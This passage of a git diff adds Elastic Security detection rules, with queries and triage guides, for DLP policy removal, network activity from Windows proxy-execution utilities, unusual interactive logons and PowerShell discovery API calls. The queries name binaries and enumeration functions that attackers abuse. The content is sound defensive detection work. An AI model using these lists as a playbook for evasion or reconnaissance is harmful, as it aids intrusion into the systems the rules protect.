"reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json new file mode 100644 index 00000000000..4ffa8af141c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring.", + "false_positives": [ + "A DLP policy may be removed by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange DLP Policy Removed", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + 
"reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "60f3adec-1df9-4104-9c75-b97d9f078b25_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json new file mode 100644 index 00000000000..4281e5c7e10 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/610949a1-312f-4e04-bb55-3a79b8c95267_107.json 
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies network activity from unexpected system applications. This may indicate adversarial activity as these applications are often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process Network Connection", + "note": "## Triage and analysis\n\n### Investigating Unusual Process Network Connection\n\nThis rule identifies network activity from unexpected system utilities and applications. These applications are commonly abused by attackers to execute code, evade detections, and bypass security protections.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that the process is communicating with.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"xwizard.exe\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "610949a1-312f-4e04-bb55-3a79b8c95267", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "610949a1-312f-4e04-bb55-3a79b8c95267_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json new file mode 100644 index 00000000000..da9caf4cb1e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_2.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Logon by an Unusual Process", + "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and process.executable : \"C:\\\\*\" and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": 
"unknown" + } + ], + "risk_score": 73, + "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad", + "setup": "\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json new file mode 100644 index 00000000000..b5551e8490e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61766ef9-48a5-4247-ad74-3349de7eb2ad_3.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies interactive logon attempt with alternate credentials and by an unusual process. Adversaries may create a new token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Interactive Logon by an Unusual Process", + "query": "authentication where \n host.os.type : \"windows\" and winlog.event_data.LogonProcessName : \"Advapi*\" and \n winlog.logon.type == \"Interactive\" and winlog.event_data.SubjectUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and \n winlog.event_data.TargetUserSid : (\"S-1-5-21*\", \"S-1-12-*\") and process.executable : \"C:\\\\*\" and \n not startswith~(winlog.event_data.SubjectUserSid, winlog.event_data.TargetUserSid) and \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\winlogon.exe\", \n \"?:\\\\Windows\\\\System32\\\\wininit.exe\", \n \"?:\\\\Program Files\\\\*.exe\", \n \"?:\\\\Program Files (x86)\\\\*.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1134/002/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.LogonProcessName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserSid", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": 
"unknown" + } + ], + "risk_score": 73, + "rule_id": "61766ef9-48a5-4247-ad74-3349de7eb2ad", + "setup": "## Setup\n\nAudit event 4624 is needed to trigger this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + }, + { + "id": "T1134.003", + "name": "Make and Impersonate Token", + "reference": "https://attack.mitre.org/techniques/T1134/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "61766ef9-48a5-4247-ad74-3349de7eb2ad_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json new file mode 100644 index 00000000000..49957d049c6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_113.json 
@@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Discovery Related Windows API Functions", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity or\n GetComputerNameEx or\n NetWkstaGetInfo or\n GetUserNameEx or\n NetUserEnum or\n NetUserGetInfo or\n NetGroupEnum or\n NetGroupGetInfo or\n NetGroupGetUsers or\n NetWkstaTransportEnum or\n NetServerGetInfo or\n LsaEnumerateTrustedDomains or\n NetScheduleJobEnum or\n NetUserModalsGet\n )\n and not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\*\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the 
logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": 
"https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 113 + }, + "id": "61ac3638-40a3-44b2-855a-985636ca985e_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json new file mode 100644 index 00000000000..310f2bcbb14 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61ac3638-40a3-44b2-855a-985636ca985e_213.json 
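Review bot: The exclusion at the end of `query` spells the Defender ATP path with `?` in place of each space (`Windows?Defender?Advanced?Threat?Protection`), which only works if `?` is honoured as a single-character wildcard by the query language; the `_213` export in the next hunk moves the same exclusion into a `filters` wildcard with the literal spaces and `case_insensitive: true`, which is the unambiguous form. If `_113` is retained for stack versions without `filters` support that is reasonable, but it should be a deliberate choice rather than a leftover.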
@@ -0,0 +1,170 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of these functions." + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\DataCollection\\\\*" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Discovery Related Windows API Functions", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries like PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not contain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed. However, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity or\n GetComputerNameEx or\n NetWkstaGetInfo or\n GetUserNameEx or\n NetUserEnum or\n NetUserGetInfo or\n NetGroupEnum or\n NetGroupGetInfo or\n NetGroupGetUsers or\n NetWkstaTransportEnum or\n NetServerGetInfo or\n LsaEnumerateTrustedDomains or\n NetScheduleJobEnum or\n NetUserModalsGet\n )\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the 
logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.001", + "name": "Local Groups", + "reference": "https://attack.mitre.org/techniques/T1069/001/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", 
+ "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 213 + }, + "id": "61ac3638-40a3-44b2-855a-985636ca985e_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json new file mode 100644 index 00000000000..3d8e08d7c65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110.json 
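Review bot: `required_fields` no longer lists `file.path`, but the new `filters` entry still reads it (`"file.path": { "case_insensitive": true, "value": ... }`); if `required_fields` is meant to document every field the rule depends on, the `{ "ecs": true, "name": "file.path", "type": "keyword" }` entry from `_113` should stay. This looks like a byproduct of deriving `required_fields` from `query` alone, in which case the exporter rather than this file needs the adjustment.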
